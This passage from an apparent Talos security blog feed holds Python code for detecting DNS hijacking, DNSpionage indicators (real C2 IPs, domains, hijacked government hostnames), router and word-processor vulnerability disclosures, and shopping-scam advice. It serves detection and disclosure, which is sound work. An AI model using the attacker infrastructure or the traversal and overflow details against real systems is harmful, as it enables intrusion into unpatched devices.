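    seen: datetime    # when the resolver / passive-DNS feed saw this answer
    hostname: str
    answer: str       # A record returned


@dataclass(frozen=True)
class CertIssuance:
    issued: datetime  # notBefore or CT log entry time
    hostname: str     # a name covered by the certificate
    issuer: str


@dataclass(frozen=True)
class Alert:
    hostname: str
    seen: datetime
    old_answer: Optional[str]
    new_answer: str
    cert_lead: Optional[timedelta]  # gap from the nearest prior certificate
    issuer: Optional[str]


def detect_redirections(observations, issuances, expected_ranges,
                        cert_window_days: float = 14) -> list:
    """One Alert per answer change that lands outside expected_ranges.

    expected_ranges maps hostname -> CIDRs the owner legitimately uses, so a
    change inside them (normal re-addressing) is ignored.  The most recent
    certificate for the name issued within cert_window_days before the change
    is attached to the alert, if there is one.
    """
    window = timedelta(days=cert_window_days)
    nets = {h: [ip_network(c) for c in cidrs] for h, cidrs in expected_ranges.items()}
    last, alerts = {}, []
    for obs in sorted(observations, key=lambda o: o.seen):
        prev = last.get(obs.hostname)
        last[obs.hostname] = obs.answer
        if obs.answer == prev:
            continue
        if any(ip_address(obs.answer) in n for n in nets.get(obs.hostname, [])):
            continue  # moved, but still inside the owner's space
        prior = [c for c in issuances if c.hostname == obs.hostname
                 and timedelta(0) <= obs.seen - c.issued <= window]
        cert = max(prior, key=lambda c: c.issued, default=None)
        alerts.append(Alert(obs.hostname, obs.seen, prev, obs.answer,
                            obs.seen - cert.issued if cert else None,
                            cert.issuer if cert else None))
    return alerts


ATTACKER_IP = "185.20.187.8"   # redirect target named in the post
LE = "Let's Encrypt"

# Constructed owner ranges (TEST-NET-2 / TEST-NET-3) and baseline answers.
EXPECTED = {
    "webmail.finance.gov.lb": ["203.0.113.0/24"],
    "adpvpn.adpolice.gov.ae": ["198.51.100.0/24"],
    "mail.mgov.ae": ["198.51.100.0/24"],
    "memail.mea.com.lb": ["203.0.113.0/24"],
}
OBSERVATIONS = [
    DnsObservation(datetime(2018, 9, 1), "webmail.finance.gov.lb", "203.0.113.10"),
    DnsObservation(datetime(2018, 10, 2), "webmail.finance.gov.lb", "203.0.113.11"),  # benign
    DnsObservation(datetime(2018, 11, 6, 6, 19, 13), "webmail.finance.gov.lb", ATTACKER_IP),
    DnsObservation(datetime(2018, 9, 1), "adpvpn.adpolice.gov.ae", "198.51.100.20"),
    DnsObservation(datetime(2018, 9, 13, 6, 39, 39), "adpvpn.adpolice.gov.ae", ATTACKER_IP),
    DnsObservation(datetime(2018, 9, 1), "mail.mgov.ae", "198.51.100.30"),
    DnsObservation(datetime(2018, 9, 15, 7, 17, 51), "mail.mgov.ae", ATTACKER_IP),
    DnsObservation(datetime(2018, 9, 1), "memail.mea.com.lb", "203.0.113.40"),
    DnsObservation(datetime(2018, 11, 14, 11, 58, 36), "memail.mea.com.lb", ATTACKER_IP),
]
# Certificate times from the post (mail.apc.gov.ae omitted: no redirect time given).
ISSUANCES = [
    CertIssuance(datetime(2018, 11, 6, 5, 7, 25), "webmail.finance.gov.lb", LE),
    CertIssuance(datetime(2018, 9, 13, 5, 37, 54), "adpvpn.adpolice.gov.ae", LE),
    CertIssuance(datetime(2018, 9, 15, 6, 15, 51), "mail.mgov.ae", LE),
    CertIssuance(datetime(2018, 11, 6, 10, 35, 10), "memail.mea.com.lb", LE),
]

if __name__ == "__main__":
    for a in detect_redirections(OBSERVATIONS, ISSUANCES, EXPECTED):
        cert = f"cert by {a.issuer} {a.cert_lead} earlier" if a.cert_lead is not None else "no recent cert"
        print(f"{a.seen:%Y-%m-%d %H:%M:%S} {a.hostname}: {a.old_answer} -> {a.new_answer}; {cert}")
```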
This is an advanced actor who obviously has their sights set on some important targets, and they don't appear to be letting up any time soon.<br /><br /><h2 id="h.6i86xkbp2smh">Coverage</h2>Snort rules <a href="https://snort.org/advisories/talos-rules-2018-11-27">48444 and 48445</a> will prevent DNSpionage from making an outbound connection.<br /><br />Additional ways our customers can detect and block this threat are listed below.<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-N1jJRgJhAQU/W_0_bTqCIFI/AAAAAAAAAl8/_nJOzRUz-G8yx0oI62Xq0v_kw6SiBgfbQCLcBGAs/s1600/image4.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="268" data-original-width="320" src="https://4.bp.blogspot.com/-N1jJRgJhAQU/W_0_bTqCIFI/AAAAAAAAAl8/_nJOzRUz-G8yx0oI62Xq0v_kw6SiBgfbQCLcBGAs/s1600/image4.png" /></a></div><br />Advanced Malware Protection (<a href="https://www.cisco.com/c/en/us/products/security/advanced-malware-protection">AMP</a>) is ideally suited to prevent the execution of the malware used by these threat actors.<br /><br />Cisco Cloud Web Security (<a href="https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html">CWS</a>) or<a href="https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html"> </a><a href="https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html">Web Security Appliance (WSA</a>) web scanning prevents access to malicious websites and detects malware used in these attacks.<br /><br /><a href="https://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html">Email Security</a> can block malicious emails sent by threat actors as part of their campaign.<br /><br />Network Security appliances such as<a href="https://www.cisco.com/c/en/us/products/security/firewalls/index.html"> </a><a 
href="https://www.cisco.com/c/en/us/products/security/firewalls/index.html">Next-Generation Firewall (NGFW</a>),<a href="https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html"> Next-Generation Intrusion Prevention System (NGIPS</a>), and<a href="https://meraki.cisco.com/products/appliances"> Meraki MX</a> can detect malicious activity associated with this threat.<br /><br /><a href="https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html">AMP Threat Grid</a> helps identify malicious binaries and build protection into all Cisco Security products.<br /><br /><a href="https://umbrella.cisco.com/">Umbrella</a>, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.<br /><br />Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on <a href="https://www.snort.org/products">Snort.org</a>.<br /><br /><h2 id="h.57ejqrrdgqmm">Indicators of Compromise (IOCs)</h2><br />The following IOCs are associated with various malware distribution campaigns that were observed during the analysis of associated malicious activity.<br /><br /><h3 id="h.mxzvx38g7gwa">Fake job websites:</h3><br />hr-wipro[.]com<br />hr-suncor[.]com<br /><br /><h3 id="h.fycj5g4k8a6z">Malicious documents:</h3><br />9ea577a4b3faaf04a3bddbfcb934c9752bed0d0fc579f2152751c5f6923f7e14 (LB submit)<br />15fe5dbcd31be15f98aa9ba18755ee6264a26f5ea0877730b00ca0646d0f25fa (LB submit)<br /><br /><h3 id="h.j2lfoys8jlkb">DNSpionage samples:</h3><br />2010f38ef300be4349e7bc287e720b1ecec678cacbf0ea0556bcf765f6e073ec 82285b6743cc5e3545d8e67740a4d04c5aed138d9f31d7c16bd11188a2042969<br />45a9edb24d4174592c69d9d37a534a518fbe2a88d3817fc0cc739e455883b8ff<br /><br /><h3 id="h.1x5r6rlex94s">C2 Server IPs:</h3><br />185.20.184.138<br />185.20.187.8<br />185.161.211.72<br /><br /><h3 
id="h.tlh9ipkmy2fa">C2 Server Domains:</h3><br />0ffice36o[.]com<br /><br /><h3 id="h.fnq2sipf26us">DNS Hijack Domains (pointed to 185.20.187.8):</h3><br />2018-11-14 : memail.mea.com.lb<br />2018-11-06 : webmail.finance.gov.lb<br />2018-09-24 : mail.apc.gov.ae<br />2018-09-15 : mail.mgov.ae<br />2018-09-13 : adpvpn.adpolice.gov.ae<br /><br /><h3 id="h.ga17stk6o3qb">Domains in the MEA certificate (on 185.20.187.8):</h3><br />memail.mea.com.lb<br />autodiscover.mea.com.lb<br />owa.mea.com.lb<br />www.mea.com.lb<br />autodiscover.mea.aero<br />autodiscover.meacorp.com.lb<br />mea.aero<br />meacorp.com.lb<br />memailr.meacorp.com.lb<br />meoutlook.meacorp.com.lb<br />tmec.mea.com.lb</div><img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/CD6ENIVNHU4" height="1" width="1" alt=""/>2018-11-29T12:47:20.755-05:000https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.htmlBeers with Talos EP42: To the Moon, Everyone!http://feedproxy.google.com/~r/feedburner/Talos/~3/jTwit8XyLhY/beers-with-talos-ep42-to-moon-everyone.htmlbeers with talosBlack FridayCyber Mondaymoonshotpodcastnoreply@blogger.com (Mitch Neff)Wed, 21 Nov 2018 12:19:00 PSTtag:blogger.com,1999:blog-1029833275466591797.post-3805186347558632211<div dir="ltr" style="text-align: left;" trbidi="on"><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-VO1MwKSiMRM/WUBDawHg2eI/AAAAAAAAAIU/lz_fWXn3B7YnoXCcqaHFQpgkXSaMpvi3QCPcBGAYYCw/s1600/facebook_timeline_podcast.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="630" data-original-width="1200" height="336" src="https://4.bp.blogspot.com/-VO1MwKSiMRM/WUBDawHg2eI/AAAAAAAAAIU/lz_fWXn3B7YnoXCcqaHFQpgkXSaMpvi3QCPcBGAYYCw/s640/facebook_timeline_podcast.jpg" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><a 
href="https://3.bp.blogspot.com/-syTSjAlQ2EU/Wnn7oGQRmrI/AAAAAAAAAMg/vMFSk35zsngnKM3izSOla6RSmylI07__QCLcBGAs/s1600/BWT_EP22_MattBubble.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div>Beers with Talos (BWT) Podcast Ep. #42 is now available. Download this episode and subscribe to Beers with Talos:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://itunes.apple.com/us/podcast/beers-with-talos-podcast/id1236329410" target="_blank"><img border="0" data-original-height="45" data-original-width="160" src="https://4.bp.blogspot.com/-WLkU01IRCLw/WaWCg3YHpRI/AAAAAAAAAJA/nQ2rFarDFeAUBY4ncARRUVaNkMpBKC0KgCLcBGAs/s1600/itunes_button.png" /></a><a href="https://play.google.com/music/listen?u=0#/ps/Ikcmodkhrjtblk5yks47s5uqbca" target="_blank"><img border="0" data-original-height="45" data-original-width="160" src="https://2.bp.blogspot.com/-E-RSSZ9jbUY/WaWCkLGZnZI/AAAAAAAAAJE/Ciiz-Si4oA0cgR9tMGSGbT9336qrYuDeACLcBGAs/s1600/google_play_button.png" /></a><a href="https://www.stitcher.com/podcast/talos/beers-with-talos" target="_blank"><img border="0" data-original-height="45" data-original-width="160" src="https://1.bp.blogspot.com/-HIihRfTvh8I/WedjsKBFNhI/AAAAAAAAAKk/TCPBZoIkYdcW8QJujRtxxwjr70x4drh_wCEwYBhgL/s1600/stitcher_button.png" /></a></div><br />If iTunes and Google Play aren't your thing, click&nbsp;<a href="http://www.talosintelligence.com/podcast">here</a>.<br /><h3>Ep. #42 show notes:&nbsp;</h3>Recorded Nov. 16, 2018.<br /><br />Cyber moonshot, baby! It’s just like that time the U.S. raced everyone to the moon, except completely different and in no way related! Do we need a “cyber moonshot?” Is the plan that was just released the way to get there? ...and holy crap if Craig didn’t actually prepare for this podcast with notes and everything. 
<br /><br />We hope that you enjoy our rants over the Thanksgiving holiday break (for our American friends) or just at work like usual for the rest of you that don’t have a four day weekend ahead. We are genuinely grateful for you, listeners, as the entire reason that we get to keep doing this podcast. We enjoy having fun spreading the word on security and calling out excellence where we find it.<br /><h3><a name='more'></a>The timeline:</h3><div><div><h4>The topics</h4>01:00 - Roundtable - Hi, Ellen. Enjoy your swag. Also, transition programs for vets we are supporting<br />12:26 - The Cyber Moonshot! That’s really all we talk about the whole hour. I know we mentioned other topics, but we just ranted way too long on the first topic.<br />1:00:19 - Closing thoughts and parting shots<br /><h4>The links</h4><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"></div><span style="font-family: &quot;arial&quot;; font-size: 10pt; vertical-align: baseline; white-space: pre-wrap;"><a href="https://www.dhs.gov/sites/default/files/publications/DRAFT_NSTAC_ReportToThePresidentOnACybersecurityMoonshot_508c.pdf" target="_blank">Cyber Moonshot draft report (public link)</a></span></div><div><br /></div><div>==========</div><div><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><br />Featuring:&nbsp;<a href="https://twitter.com/security_craig">Craig Williams</a>&nbsp;(@Security_Craig),&nbsp;<a href="https://twitter.com/JoelEsler">Joel Esler</a>&nbsp;(@JoelEsler),&nbsp;<a href="https://twitter.com/kpyke">Matt Olney</a>&nbsp;(@kpyke) and&nbsp;<a href="https://twitter.com/EnglishLFC">Nigel Houghton</a>&nbsp;(@EnglishLFC).<br />Hosted by&nbsp;<a href="https://twitter.com/MitchNeff">Mitch Neff</a>&nbsp;(@MitchNeff).<br />Find all episodes&nbsp;<a href="http://cs.co/talospodcast">here</a>.<br /><br /><a href="http://cs.co/talositunes">Subscribe via iTunes</a>&nbsp;(and leave a review!)<br /><br />Check out the&nbsp;<a 
href="http://cs.co/talosresearch">Talos Threat Research Blog</a><br /><br />Subscribe to the&nbsp;<a href="http://cs.co/talosupdate">Threat Source newsletter</a><br /><br />Follow&nbsp;<a href="http://cs.co/talostwitter">Talos on Twitter</a><br /><br />Give us your feedback and suggestions for topics:<br /><a href="mailto:beerswithtalos@cisco.com">beerswithtalos@cisco.com</a></div></div></div></div><img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/jTwit8XyLhY" height="1" width="1" alt=""/>2018-11-21T19:09:14.119-05:000https://blog.talosintelligence.com/2018/11/beers-with-talos-ep42-to-moon-everyone.htmlVulnerability Spotlight: Multiple remote code execution vulnerabilities in Atlantis Word Processorhttp://feedproxy.google.com/~r/feedburner/Talos/~3/nTzI-vDPrp0/Atlantis-Word-Processor-RCE-vulns.htmlAtlantisAtlantis Word Processorremote code executionvuln devvulnerabilitiesnoreply@blogger.com (Jonathan Munshaw)Tue, 20 Nov 2018 07:35:00 PSTtag:blogger.com,1999:blog-1029833275466591797.post-5270947630146892011<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-P8KhgoWhlIU/XBKug9FQhtI/AAAAAAAAABA/f82RweNOqB8M4Nm-MFusv6czQrmRCygvACPcBGAYYCw/s1600/recurring%2Bblog%2Bimages_vuln%2Bspotlight.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="501" data-original-width="1001" src="https://4.bp.blogspot.com/-P8KhgoWhlIU/XBKug9FQhtI/AAAAAAAAABA/f82RweNOqB8M4Nm-MFusv6czQrmRCygvACPcBGAYYCw/s1600/recurring%2Bblog%2Bimages_vuln%2Bspotlight.jpg" /></a></div><i><br /></i><i>A member of Cisco Talos discovered these vulnerabilities.</i><br /><h2 style="text-align: left;">Executive summary</h2>Today, Cisco Talos is disclosing three remote code execution vulnerabilities in the Atlantis Word Processor. 
Atlantis Word Processor is a traditional word processor that provides a number of basic features for users, in line with what is in other similar types of software. This application is written in Delphi and keeps the majority of its capabilities in a single, relocatable binary. An attacker could exploit these vulnerabilities to corrupt the memory of the application, which can result in remote code execution under the context of the application.<br /><br />In accordance with our coordinated disclosure policy, Cisco Talos worked with Atlantis to ensure that these issues are resolved and that <a href="https://www.atlantiswordprocessor.com/en/downloads.htm">an update</a> is available for affected customers.<br /><br /><a name='more'></a><br /><h2 style="text-align: left;">Vulnerability details</h2><b>Atlantis Word Processor open document format NewAnsiString length remote code execution vulnerability (TALOS-2018-0711/CVE-2018-4038)</b><br /><br />The word processor contains an exploitable arbitrary write vulnerability in the open document format parser while trying to null-terminate a string. A specially crafted document could allow an attacker to pass an untrusted value as a length to a constructor, which miscalculates a length and then uses it to calculate the position to write a null byte. This particular bug lies in the `NewAnsiString` function.<br /><br />For more information on this vulnerability, read the full advisory <a href="http://www.talosintelligence.com/reports/TALOS-2018-0711">here</a>.<br /><br /><b>Atlantis Word Processor Huffman table code length remote code execution vulnerability (TALOS-2018-0712/CVE-2018-4039)</b><br /><br />Atlantis Word Processor contains an out-of-bounds write vulnerability in its PNG implementation. When opening a specially crafted document, which would need to be supplied by an attacker, the application fingerprints it in order to determine the correct file format parser. 
Eventually, an attacker could corrupt memory, which would allow them to execute arbitrary code in the context of the application. A user only needs to open the document to trigger this vulnerability.<br /><br />For more information on this vulnerability, read the full advisory <a href="http://www.talosintelligence.com/reports/TALOS-2018-0712">here</a>.<br /><br /><b>Atlantis Word Processor rich text format uninitialized TAutoList remote code execution vulnerability (TALOS-2018-0713/CVE-2018-4040)</b><br /><br />An exploitable uninitialized pointer vulnerability exists in the rich text format parser of Atlantis Word Processor. A specially crafted document can cause certain RTF tokens to dereference an uninitialized pointer and then write to it. When opening up an RTF document, the application will first fingerprint it in order to determine the correct file format parser. Eventually, this would corrupt the memory of the application, allowing an attacker to execute code in the context of the application.<br /><br />For more information on this vulnerability, read the full advisory <a href="http://www.talosintelligence.com/reports/TALOS-2018-0713">here</a>.<br /><br /><h2 style="text-align: left;">Versions tested</h2>Talos tested and confirmed that Atlantis Word Processor version 3.2.7.2 is affected by these vulnerabilities.<br /><br /><h2 style="text-align: left;">Conclusion</h2>All three of these vulnerabilities are triggered by the user opening a malicious, specially crafted document. The easiest way to avoid these issues is for the user to ensure that they don’t open any documents from untrusted sources. 
The <a href="https://www.atlantiswordprocessor.com/en/downloads.htm">latest update</a> from Atlantis will also cover these vulnerabilities, as will the Snort rules listed below.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://www.atlantiswordprocessor.com/en/downloads.htm"><img border="0" data-original-height="251" data-original-width="1250" height="128" src="https://4.bp.blogspot.com/-88IoUK8efak/W_QN7sl_GMI/AAAAAAAAEp0/WAMOgXu72FIyWFHnvNVTBV6WQSjRMdm5ACLcBGAs/s640/patch_availability_available.jpg" width="640" /></a></div><br /><h2 style="text-align: left;">Coverage</h2>The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.<br /><br />Snort Rules: <a href="https://snort.org/advisories/652">48385, 48386, 48389 - 48392</a><br /><div><br /></div></div><img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/nTzI-vDPrp0" height="1" width="1" alt=""/>2018-12-13T14:47:38.302-05:000https://blog.talosintelligence.com/2018/11/Atlantis-Word-Processor-RCE-vulns.htmlWhat scams shoppers should look out for on Black Friday and Cyber Mondayhttp://feedproxy.google.com/~r/feedburner/Talos/~3/I_PPrec4k5Q/what-scams-shoppers-should-look-out-for.htmlBlack FridayCyber Mondayemailholidayphishingshoppingspear phishingnoreply@blogger.com (Jonathan Munshaw)Mon, 19 Nov 2018 12:28:00 PSTtag:blogger.com,1999:blog-1029833275466591797.post-8755441525370080831<div dir="ltr" style="text-align: left;" trbidi="on">Every year, more and more Americans are taking care of their holiday shopping on Cyber Monday.<br /><br />Last year, consumers spent a record $6.59 billion during the annual online shopping day, an all-time record, according to <a 
href="https://news.adobe.com/press-release/experience-cloud/adobe-data-shows-cyber-monday-largest-online-sales-day-history-659">Adobe Insights</a>. Still, that doesn’t mean no one is rushing out the night of Thanksgiving to do their shopping. Shoppers still went out in droves on Black Friday last year — Adobe estimated that Americans spent $2.43 billion on Nov. 25, 2017.<br /><br /><a name='more'></a>These two frenzied days open the door for bad actors to take advantage, hoping to trick uneducated consumers into clicking on malicious ads (a.k.a. malvertising) and emails disguised as shopping deals to phish credit card and personal information. Last year, 71 percent of emails that mentioned either “Black Friday” or “Cyber Monday” by name were classified as spam by Cisco Talos. Of that spam, 96 percent of the emails came from uncommon top-level domains (TLDs) such as .top, .stream, .trade and .bid.<br /><br />One of the most prevalent domains associated with these emails is hxxp://bags-black-friday[.]top, which utilized the <a href="https://umbrella.cisco.com/blog/2016/12/19/in-the-eye-of-hailstorm/">“hailstorm”</a> method. This means that the attacker registered many domains and used them to send hundreds of spam emails in a matter of minutes, only to never use those domains again. Since those domains have no history in detection software, they can easily blow by security systems and land in users’ inboxes. 
The Cisco Umbrella data for bags-black-friday is below.<br /><br /><span id="docs-internal-guid-6d66d640-7fff-2058-3103-75b88fbeb5c9"><span style="font-family: &quot;arial&quot;; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><img height="248" src="https://lh4.googleusercontent.com/BZF1jED_oAYj90VS7iHIJD1h4zjxJJJ22vcLxMkh3p4wrmn9jsd9Fp-_a2lPxUWppF05h4jMyNQwA5KHO-8jSbnScmZ1m_638_GjxkXYwoYoG5eKFKCbZnFyfWm_7fKRKONPZAW3" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624" /></span></span><br /><br />Based on last year’s metrics, Talos believes that there will be a similar spike in these kinds of emails after the holiday shopping season kicks off.<br /><br />Talos has also seen several malicious sites hoping to capitalize on Black Friday and Cyber Monday. We have blacklisted several sites that contain either “Black Friday” or “Cyber Monday” directly in the URL name, indicating that attackers are hoping to draw customers in who are looking for deals specific to those shopping days. A complete list of these domains is in the “IOCs” section below.<br /><br />Some of these URLs reference popular stores that often run sales, such as J.C. Penney and Pandora jewelry. There are several other malicious URLs that mention these holidays but have been inactive for an extended period of time as of Nov. 14. As we get closer to Thanksgiving, we anticipate that the number of URLs targeted at shoppers will rise, as well. 
It is typical of attackers to set up these malicious sites just as the shopping days are arriving, hoping to show up in internet searches and bypass the usual detection, as with the email campaigns mentioned above.<br /><br />There are also specific malware attacks that have tried to capitalize on these “holidays.” For example, Microsoft discovered a malware campaign in 2016 that <a href="https://cloudblogs.microsoft.com/microsoftsecure/2016/11/23/dont-let-this-black-friday-cyber-monday-spam-deliver-locky-ransomware-to-you/">disguised itself as a special deal</a> from online retailer Amazon that downloaded the Locky ransomware onto victims’ machines. Locky is ransomware that has been spread for years, <a href="https://blog.talosintelligence.com/2017/06/necurs-locky-campaign.html">mainly through email campaigns</a>. Once launched, the malware will encrypt users’ files and ask for a payment in order to return the files. However, the threat of Locky has largely been wiped out by antivirus detection engines over the past year. (If you happen to be infected with Locky, we have an open-source decryptor <a href="https://www.talosintelligence.com/lockydump">here</a> called “LockyDump” that can help you recover your files.)<br /><br />With these numbers in mind, Talos recommends that shoppers take the following advice when planning to shop on Black Friday and Cyber Monday to protect themselves from common scams:<br /><br /><ul style="text-align: left;"><li>Ensure that you are only downloading apps from trusted and official app stores like the Google Play store and iOS App Store.&nbsp;</li><li>Look out for apps that ask for suspicious permissions, such as access to your text messages, contacts, stored passwords and administrative features.</li><li>Some malicious apps will try to masquerade as a legitimate version of the one you could be searching for. 
Signs of these apps include poor spelling and grammar in app descriptions and interfaces, poor performance and a developer contact that uses a free email service (such as @gmail.com).</li><li>Avoid clicking on unsolicited emails. Make sure that you purposely subscribed to any marketing emails you are receiving from retailers.</li><li>Do not open any files from untrusted sources. These often contain files that will execute unwanted programs on your machine.</li><li>Use an ad blocker locally in your browser. These will often block malvertising campaigns that aim to capitalize on shoppers looking for deals.</li><li>Try to use payment services such as Google Pay, Samsung Pay and Apple Pay. These services use tokenization instead of the “Primary Account Number” (your credit card number), making your transaction more secure.</li><li>Use complex passwords that are unique per site. Attackers commonly reuse passwords as a way to compromise multiple accounts with the same username.</li><li>If a deal sounds too good to be true, it probably is.</li></ul><br />Our customers can detect and block these kinds of threats, as well, through a variety of our products.<br /><br /><b>IOCs</b><br /><br />Original post: <a href="https://blog.talosintelligence.com/2018/11/what-scams-shoppers-should-look-out-for.html">https://blog.talosintelligence.com/2018/11/what-scams-shoppers-should-look-out-for.html</a></div><br /><br /><b>Vulnerability Spotlight: Multiple remote vulnerabilities in TP-Link TL-R600VPN</b><br />Posted by Vitor Ventura, Mon, 19 Nov 2018 06:30:00 PST, <a href="https://blog.talosintelligence.com/2018/11/tplinkr600.html">https://blog.talosintelligence.com/2018/11/tplinkr600.html</a><br /><br /><div dir="ltr" style="text-align: left;" trbidi="on"><i>Vulnerabilities discovered by Carl Hurd and Jared Rittle of Cisco Talos.</i><br /><br />Cisco Talos is disclosing multiple vulnerabilities in the TP-Link TL-R600VPN router. TP-Link produces a number of different types of small office/home office (SOHO) routers. 
Talos discovered several bugs in this particular router model that could lead to remote code execution.<br /><br /><h2>Overview</h2><br />There are two root causes of the vulnerabilities: a lack of input sanitisation and parsing errors. The lack of proper input sanitisation leads to the vulnerabilities TALOS-2018-0617 and TALOS-2018-0618, which can be exploited without authentication. Parsing errors are responsible for the vulnerabilities TALOS-2018-0619 and TALOS-2018-0620; however, these can only be exploited with an authenticated session. The remote code execution takes place in the context of the HTTPD process. Since HTTPD runs as root, an attacker can run code with elevated privileges.<br /><br />All vulnerabilities were found on HWv3 FRNv1.3.0 and HWv2 FRNv1.2.3, except for TALOS-2018-0620, which was found only on HWv3 FRNv1.3.0.<br /><br /><h3>TALOS-2018-0617 — TP-Link TL-R600VPN HTTP denial of service</h3><br />An exploitable denial-of-service vulnerability exists in the URI-parsing function of the TP-Link TL-R600VPN HTTP server. If a directory traversal is attempted on any of the vulnerable pages (help, images, frames, dynaform, localization) and the requested page is a directory instead of a file, the web server will enter an infinite loop, making the management portal unavailable. This request does not need to be authenticated.<br /><br />CVE: CVE-2018-3948<br /><br />A full technical advisory is available <a href="https://talosintelligence.com/vulnerability_reports/TALOS-2018-0617">here</a>.<br /><br /><h3>TALOS-2018-0618 — TP-Link TL-R600VPN HTTP server information disclosure</h3><br />An exploitable information disclosure vulnerability exists in the HTTP server functionality of the TP-Link TL-R600VPN. A directory traversal vulnerability exists in the TP-Link TL-R600VPN in both authenticated and unauthenticated forms. 
If a standard directory traversal is used with a base page of 'help,' the traversal does not require authentication and can read any file on the system.<br /><br />CVE: CVE-2018-3949<br /><br />A full technical advisory is available <a href="https://talosintelligence.com/vulnerability_reports/TALOS-2018-0618">here</a>.<br /><br /><h3>TALOS-2018-0619 — TP-Link TL-R600VPN HTTP server ping address remote code execution</h3><br />An exploitable remote code execution vulnerability exists in the ping and traceroute functions of the TP-Link TL-R600VPN HTTP server. The router does not check the size of the data passed to its 'ping_addr' field when performing a ping operation. By sending a large amount of data to this field, an attacker could cause a stack-based buffer overflow, leading to remote code execution or a simple crash of the device's HTTP server. An attacker would need to be in an authenticated session to trigger this vulnerability.<br /><br />CVE: CVE-2018-3950<br /><br />A full technical advisory is available <a href="https://talosintelligence.com/vulnerability_reports/TALOS-2018-0619">here</a>.<br /><br /><h3>TALOS-2018-0620 — TP-Link TL-R600VPN HTTP server fs directory remote code execution</h3><br />An exploitable remote code execution vulnerability exists in the HTTP header-parsing function of the TP-Link TL-R600VPN HTTP server. A specially crafted HTTP request can cause a buffer overflow, resulting in remote code execution on the device. During this process, the server calculates the length of the user-controlled HTTP header buffer and adds the value to the input buffer offset. This creates an overflow condition when the router processes a longer-than-expected GET request. 
An attacker needs to be authenticated to be able to trigger this vulnerability.<br /><br />CVE: CVE-2018-3951<br /><br />A full technical advisory is available <a href="https://talosintelligence.com/vulnerability_reports/TALOS-2018-0620">here</a>.<br /><br /><h2>Discussion</h2><br />Over the past year, Talos has disclosed various vulnerabilities in internet-of-things (IoT) devices and SOHO routers. These are just the latest examples showing that such devices are not only vulnerable, but also lack the generic operating system protections that mitigate vulnerabilities like buffer overflows. Fortunately, in the case of the TL-R600VPN, the critical vulnerabilities that lead to remote code execution require authentication. However, the code would be executed with root privileges.<br /><br /><img border="0" height="128" src="https://3.bp.blogspot.com/-dOUdAKn0kko/W_LMi0_j5uI/AAAAAAAAEpk/hvKaeSGCOnA4CAwr9SdyT5cDlnhtpuqKACK4BGAYYCw/s640/patch_availability_available.jpg" width="640" alt="Patch availability: available" /><br /><h2>Coverage</h2><br />The following Snort IDs have been released to detect these vulnerabilities:<br /><br /><ul><li><a href="https://snort.org/advisories/577">47039-47040</a></li><li><a href="https://snort.org/advisories/577">47037</a></li><li><a href="https://snort.org/advisories/577">47062</a></li></ul></div><br /><br /><b>Threat Roundup for Nov. 9 to Nov. 16</b><br />Posted by William Largent, Fri, 16 Nov 2018 11:20:00 PST, <a href="http://feedproxy.google.com/~r/feedburner/Talos/~3/heeAUQuVzwQ/threat-roundup-1109-1116.html">http://feedproxy.google.com/~r/feedburner/Talos/~3/heeAUQuVzwQ/threat-roundup-1109-1116.html</a><br /><br /><div dir="ltr" style="text-align: left;" trbidi="on">Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 9 and Nov. 16. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, it summarizes the threats we've observed by highlighting key behavioral characteristics and indicators of compromise, and discusses how our customers are automatically protected from these threats.<br /><br />As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats are subject to updates, pending additional threat or vulnerability analysis. 
For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.<br /><br />You can find an additional JSON file <a href="https://alln-extcloud-storage.cisco.com/ciscoblogs/5bef0395049e0.txt">here</a> that includes the IOCs in this post, as well as all hashes associated with the cluster. That list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness.<br /><br />The most prevalent threats highlighted in this roundup are:<br /><br /><ul><li><b>Win.Ransomware.Gandcrab-6748603-0</b><br /> Ransomware<br /> Gandcrab is ransomware that encrypts documents, photos, databases and other important files using the file extension ".GDCB", ".CRAB" or ".KRAB". It's spread through traditional spam campaigns, as well as multiple exploit kits, including Rig and Grandsoft.</li><li><b>Win.Virus.Parite-6748128-0</b><br /> Virus<br /> Parite is a polymorphic file infector. It infects executable files on the local machine and on network 